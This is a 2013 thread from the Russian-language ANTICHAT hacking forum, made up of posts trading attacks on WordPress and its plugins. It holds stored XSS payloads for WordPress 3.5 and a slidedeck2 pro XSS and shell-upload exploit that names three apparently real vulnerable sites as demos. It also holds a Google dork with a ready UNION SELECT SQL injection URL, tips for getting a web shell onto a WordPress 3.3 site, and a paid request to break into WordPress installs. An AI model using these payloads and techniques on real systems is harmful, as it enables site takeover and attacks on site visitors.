ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

03.01.2013, 18:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 3501
Репутация:
0
|
|
Сообщение от MaxFast
MaxFast said:
Wordpress 3.5 Active XSS
Нужны права администратора.
Идем в комментарии к записи, и в комментариях вставляем JS код, к примеру:
Код:
Code:
">alert('XSS Test')
Проверить можно тут.
Код:
Code:
L: test
P: test
(c) MaxFast aka n3m1s
C правами админа и iframe можно вставить.
|
|
|
|

12.01.2013, 22:15
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме: 72737
Репутация:
1
|
|
Intelligently guesses hash values in order to extract Wordpress password hashes via W3 Total Cache.
+# This affects W3 Total Cache
|
|
|

21.02.2013, 22:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Wordpress Plugins - slidedeck2 pro XSS/File Upload Vulnerability
Код HTML:
HTML:
# Author => Zikou-16
# Download plugin : http://wordpress.org/extend/plugins/slidedeck2/
#=> Exploit Info :
------------------
# The attacker can inject HTML codes & inject a simple file uploader to upload shell
------------------
------------------
#=> XSS
------------------
http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
inj3ct u'r HTML codes in (Text) then click Copy To Clipboard...
screenshot #=> http://i49.tinypic.com/1zgqngx.png
------------------
#=> Shell Upload
------------------
http://[target]/[path]/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
inj3ct u'r simple file uploader & upload u'r shell
screenshot #=> http://i45.tinypic.com/1426mhg.jpg
------------------
#=> Demos
------------------
http://thevillagevenue.com/wordpress/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
http://dreamland.com.pk/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
http://oldsouthpawn.com/wp-content/plugins/slidedeck2-pro/js/zeroclipboard/test.html
Судя по описанию автора можно вставить простой HTML код загрузки файла с компа, но есть одно большое НО! Без исполняющего .php файла на сервере никакая HTML форма загрузки не сможет залить файл на сервак.
Вопрос: какие идеи?
© Источник
|
|
|
|

27.03.2013, 21:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
wordpress
Если нарушаю правила, прошу админа не наказывать строго, просто очень нужно не знаю где запостить.. Вопрос состоит вот в чем. Настроил 2 вордпресса, слышал тут есть умельцы, которые щелкают их как семечки. Кто сможет получить доступ хоть на 1 из моих WP плачу 100 wmz (или обговорим на большее).. прошу проявить лояльность и не удалять этот топик, никаких данных тут не кидаю все вопросы в аську...
icq: 640831391
|
|
|
|

25.04.2013, 02:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 252
Репутация:
0
|
|
Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?
Есть папка uploads, где видно все файлы. Значит где то есть uploader?
|
|
|
|

09.05.2013, 18:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 24770
Репутация:
2
|
|
Сообщение от Mastahh
Mastahh said:
Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?
Есть папка uploads, где видно все файлы. Значит где то есть uploader?
Просканируй сайт этой прогой Web Vulnerability Scanner 8
там будет папка wp-content/plugins Так вот в ней и лежал плагины
|
|
|
|

31.05.2013, 14:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Версия 3.5 и 3.5.1
Чтобы воспользоваться ниже упомянутой уязвимостью нужно иметь права редактора или администратора, то есть права на размещение/редактирование новостей. При размещении в тело сообщения JavaScript кода:
Код:
Code:
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ">'>alert(String.fromCharCode(88,83,83))
после чего и срабатывает уязвимость. Таким образом мы видим, что злоумышленник может получить возможность атаковать всех пользователей, которые просто зайдут почитать размещённую новость или статью. При определенных манипуляциях с кодом можно также заразить массу посетителей сайта вирусом, перенаправляя их на вредоносный сайт.
|
|
|
|

02.06.2013, 00:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
все облазил) никак не получается шелл впихнуть на wp 3.3. при загрузке плагинов\тем просит FTP доступ напомнить ему. редактор не помогает. Есть варианты какие нибудь?
EDIT
Все мои попытки загружать медиафайлы отображаются в графе Медиафайлы (с пометкой что не прикреплены или еще что нибудь) жмем редактировать -> узнаем путь -> профит. может пригодится кому нибудь)
|
|
|
|

27.06.2013, 14:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 182660
Репутация:
324
|
|
WordPress marker_listings.xml SQL injection
Google dork:
Код:
Code:
inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="
Vulnerable script:
Код:
Code:
h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+
|
|
|
|

27.08.2013, 22:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 6296
Репутация:
0
|
|
Ребят, как эксплуатировать эту уязвимость, WordPress WP-Print Plugin CSRF
Сам плагин, версии 2.31
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|